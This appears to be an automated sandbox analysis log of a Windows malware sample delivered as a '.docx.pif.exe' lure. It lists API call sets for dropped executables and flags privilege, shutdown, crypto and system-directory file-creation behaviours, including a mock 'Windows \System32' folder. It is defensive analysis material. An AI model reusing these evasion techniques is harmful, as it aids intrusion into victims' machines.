Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	10_2_00007FF64B563D94
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	10_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken,	10_2_00007FF64B5789E4
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	12_2_00007FF64B578114
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	12_2_00007FF64B58BCF0
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	12_2_00007FF64B5788C0
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	12_2_00007FF64B577FF8
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B57898C NtQueryInformationToken,	12_2_00007FF64B57898C
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	12_2_00007FF64B563D94
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	12_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken,	12_2_00007FF64B5789E4
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	14_2_00007FF64B578114
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	14_2_00007FF64B58BCF0
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	14_2_00007FF64B5788C0
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	14_2_00007FF64B577FF8
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B57898C NtQueryInformationToken,	14_2_00007FF64B57898C
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	14_2_00007FF64B563D94
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	14_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken,	14_2_00007FF64B5789E4
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	17_2_00007FF64B578114
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	17_2_00007FF64B58BCF0
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	17_2_00007FF64B5788C0
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	17_2_00007FF64B577FF8
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B57898C NtQueryInformationToken,	17_2_00007FF64B57898C
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	17_2_00007FF64B563D94
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	17_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken,	17_2_00007FF64B5789E4
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A09890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey,	24_2_00007FF7E0A09890

Contains functionality to communicate with device drivers

Source: C:\Users\Public\alpha.exe

8_2_00007FF64B565240

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

0_2_029981B8

Contains functionality to shutdown / reboot the system

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_045967B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,

31_2_045967B4

Creates files inside the system directory

Source: C:\Users\Public\alpha.exe	File created: C:\Windows	Jump to behavior
Source: C:\Users\Public\alpha.exe	File created: C:\Windows \System32	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	File created: C:\Windows \System32\per.exe	Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029820C4	0_2_029820C4
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_0040E800	3_2_0040E800
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_0040C838	3_2_0040C838
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_0040F1CA	3_2_0040F1CA
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_00411250	3_2_00411250
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_004102D0	3_2_004102D0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_0040B2E7	3_2_0040B2E7
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_004102F0	3_2_004102F0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_004105F0	3_2_004105F0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_00410673	3_2_00410673
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_004106B9	3_2_004106B9
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_0040E800	3_1_0040E800
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_0040C838	3_1_0040C838
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_0040F1CA	3_1_0040F1CA
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_00411250	3_1_00411250
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_004102D0	3_1_004102D0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_0040B2E7	3_1_0040B2E7
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_004102F0	3_1_004102F0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_004105F0	3_1_004105F0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_00410673	3_1_00410673
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_004106B9	3_1_004106B9
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B567D30	8_2_00007FF64B567D30
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B5737D8	8_2_00007FF64B5737D8
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B56AA54	8_2_00007FF64B56AA54
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B575554	8_2_00007FF64B575554
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B561884	8_2_00007FF64B561884
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B562C48	8_2_00007FF64B562C48
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B577854	8_2_00007FF64B577854
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B58AC4C	8_2_00007FF64B58AC4C
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B568510	8_2_00007FF64B568510
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B56B0D8	8_2_00007FF64B56B0D8
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B5718D4	8_2_00007FF64B5718D4
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B563F90	8_2_00007FF64B563F90
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B565B70	8_2_00007FF64B565B70
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B569B50	8_2_00007FF64B569B50
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B563410	8_2_00007FF64B563410
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B566BE0	8_2_00007FF64B566BE0
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B58AFBC	8_2_00007FF64B58AFBC
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B56E680	8_2_00007FF64B56E680
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B58EE88	8_2_00007FF64B58EE88
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B570A6C	8_2_00007FF64B570A6C
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B565240	8_2_00007FF64B565240
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B56D250	8_2_00007FF64B56D250
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B569E50	8_2_00007FF64B569E50
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B567650	8_2_00007FF64B567650
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B56372C	8_2_00007FF64B56372C
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B587F00	8_2_00007FF64B587F00
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B566EE4	8_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B591538	8_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B574224	8_2_00007FF64B574224
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B562220	8_2_00007FF64B562220
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B58AA30	8_2_00007FF64B58AA30
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B564A30	8_2_00007FF64B564A30
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B568DF8	8_2_00007FF64B568DF8
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B56CE10	8_2_00007FF64B56CE10
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B58D9D0	8_2_00007FF64B58D9D0
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B5681D4	8_2_00007FF64B5681D4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B567D30	10_2_00007FF64B567D30
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B5737D8	10_2_00007FF64B5737D8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B56AA54	10_2_00007FF64B56AA54
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B575554	10_2_00007FF64B575554
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B561884	10_2_00007FF64B561884
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B562C48	10_2_00007FF64B562C48
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B577854	10_2_00007FF64B577854
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B58AC4C	10_2_00007FF64B58AC4C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B568510	10_2_00007FF64B568510
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B56B0D8	10_2_00007FF64B56B0D8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B5718D4	10_2_00007FF64B5718D4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B563F90	10_2_00007FF64B563F90
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B565B70	10_2_00007FF64B565B70
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B569B50	10_2_00007FF64B569B50
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B563410	10_2_00007FF64B563410
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B566BE0	10_2_00007FF64B566BE0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B58AFBC	10_2_00007FF64B58AFBC
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B56E680	10_2_00007FF64B56E680
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B58EE88	10_2_00007FF64B58EE88
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B570A6C	10_2_00007FF64B570A6C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B565240	10_2_00007FF64B565240
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B56D250	10_2_00007FF64B56D250
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B569E50	10_2_00007FF64B569E50
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B567650	10_2_00007FF64B567650
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B56372C	10_2_00007FF64B56372C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B587F00	10_2_00007FF64B587F00
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B566EE4	10_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B591538	10_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B574224	10_2_00007FF64B574224
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B562220	10_2_00007FF64B562220
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B58AA30	10_2_00007FF64B58AA30
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B564A30	10_2_00007FF64B564A30
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B568DF8	10_2_00007FF64B568DF8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B56CE10	10_2_00007FF64B56CE10
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B58D9D0	10_2_00007FF64B58D9D0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B5681D4	10_2_00007FF64B5681D4
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B5737D8	12_2_00007FF64B5737D8
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B570A6C	12_2_00007FF64B570A6C
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B56AA54	12_2_00007FF64B56AA54
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B575554	12_2_00007FF64B575554
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B574224	12_2_00007FF64B574224
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B561884	12_2_00007FF64B561884
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B562C48	12_2_00007FF64B562C48
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B577854	12_2_00007FF64B577854
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B58AC4C	12_2_00007FF64B58AC4C
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B567D30	12_2_00007FF64B567D30
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B568510	12_2_00007FF64B568510
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B56B0D8	12_2_00007FF64B56B0D8
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B5718D4	12_2_00007FF64B5718D4
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B563F90	12_2_00007FF64B563F90
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B565B70	12_2_00007FF64B565B70
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B569B50	12_2_00007FF64B569B50
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B563410	12_2_00007FF64B563410
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B566BE0	12_2_00007FF64B566BE0
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B58AFBC	12_2_00007FF64B58AFBC
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B56E680	12_2_00007FF64B56E680
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B58EE88	12_2_00007FF64B58EE88
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B565240	12_2_00007FF64B565240
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B56D250	12_2_00007FF64B56D250
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B569E50	12_2_00007FF64B569E50
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B567650	12_2_00007FF64B567650
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B56372C	12_2_00007FF64B56372C
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B587F00	12_2_00007FF64B587F00
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B566EE4	12_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B591538	12_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B562220	12_2_00007FF64B562220
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B58AA30	12_2_00007FF64B58AA30
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B564A30	12_2_00007FF64B564A30
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B568DF8	12_2_00007FF64B568DF8
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B56CE10	12_2_00007FF64B56CE10
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B58D9D0	12_2_00007FF64B58D9D0
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B5681D4	12_2_00007FF64B5681D4
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B5737D8	14_2_00007FF64B5737D8
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B570A6C	14_2_00007FF64B570A6C
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B56AA54	14_2_00007FF64B56AA54
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B575554	14_2_00007FF64B575554
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B574224	14_2_00007FF64B574224
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B561884	14_2_00007FF64B561884
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B562C48	14_2_00007FF64B562C48
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B577854	14_2_00007FF64B577854
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B58AC4C	14_2_00007FF64B58AC4C
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B567D30	14_2_00007FF64B567D30
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B568510	14_2_00007FF64B568510
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B56B0D8	14_2_00007FF64B56B0D8
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B5718D4	14_2_00007FF64B5718D4
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B563F90	14_2_00007FF64B563F90
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B565B70	14_2_00007FF64B565B70
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B569B50	14_2_00007FF64B569B50
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B563410	14_2_00007FF64B563410
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B566BE0	14_2_00007FF64B566BE0
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B58AFBC	14_2_00007FF64B58AFBC
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B56E680	14_2_00007FF64B56E680
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B58EE88	14_2_00007FF64B58EE88
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B565240	14_2_00007FF64B565240
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B56D250	14_2_00007FF64B56D250
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B569E50	14_2_00007FF64B569E50
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B567650	14_2_00007FF64B567650
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B56372C	14_2_00007FF64B56372C
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B587F00	14_2_00007FF64B587F00
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B566EE4	14_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B591538	14_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B562220	14_2_00007FF64B562220
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B58AA30	14_2_00007FF64B58AA30
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B564A30	14_2_00007FF64B564A30
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B568DF8	14_2_00007FF64B568DF8
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B56CE10	14_2_00007FF64B56CE10
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B58D9D0	14_2_00007FF64B58D9D0
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B5681D4	14_2_00007FF64B5681D4
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B5737D8	17_2_00007FF64B5737D8
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B570A6C	17_2_00007FF64B570A6C
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B56AA54	17_2_00007FF64B56AA54
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B575554	17_2_00007FF64B575554
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B574224	17_2_00007FF64B574224
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B561884	17_2_00007FF64B561884
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B562C48	17_2_00007FF64B562C48
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B577854	17_2_00007FF64B577854
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B58AC4C	17_2_00007FF64B58AC4C
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B567D30	17_2_00007FF64B567D30
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B568510	17_2_00007FF64B568510
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B56B0D8	17_2_00007FF64B56B0D8
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B5718D4	17_2_00007FF64B5718D4
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B563F90	17_2_00007FF64B563F90
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B565B70	17_2_00007FF64B565B70
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B569B50	17_2_00007FF64B569B50
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B563410	17_2_00007FF64B563410
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B566BE0	17_2_00007FF64B566BE0
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B58AFBC	17_2_00007FF64B58AFBC
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B56E680	17_2_00007FF64B56E680
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B58EE88	17_2_00007FF64B58EE88
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B565240	17_2_00007FF64B565240
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B56D250	17_2_00007FF64B56D250
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B569E50	17_2_00007FF64B569E50
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B567650	17_2_00007FF64B567650
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B56372C	17_2_00007FF64B56372C
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B587F00	17_2_00007FF64B587F00
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B566EE4	17_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B591538	17_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B562220	17_2_00007FF64B562220
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B58AA30	17_2_00007FF64B58AA30
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B564A30	17_2_00007FF64B564A30
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B568DF8	17_2_00007FF64B568DF8
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B56CE10	17_2_00007FF64B56CE10
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B58D9D0	17_2_00007FF64B58D9D0
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B5681D4	17_2_00007FF64B5681D4
Source: C:\Users\Public\xkn.exe	Code function: 22_2_00007FFAAC8B0EF5	22_2_00007FFAAC8B0EF5
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A06054	24_2_00007FF7E0A06054
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A01664	24_2_00007FF7E0A01664
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A0596C	24_2_00007FF7E0A0596C
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A072C0	24_2_00007FF7E0A072C0
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A06EC8	24_2_00007FF7E0A06EC8
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A067A0	24_2_00007FF7E0A067A0
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A083D8	24_2_00007FF7E0A083D8
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A06AE8	24_2_00007FF7E0A06AE8
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A04050	24_2_00007FF7E0A04050
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A04318	24_2_00007FF7E0A04318
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A05128	24_2_00007FF7E0A05128
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A09890	24_2_00007FF7E0A09890
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A07C7C	24_2_00007FF7E0A07C7C
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A09C74	24_2_00007FF7E0A09C74
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A07670	24_2_00007FF7E0A07670
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A02D70	24_2_00007FF7E0A02D70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B74E6	31_2_045B74E6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045BE558	31_2_045BE558
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B8770	31_2_045B8770
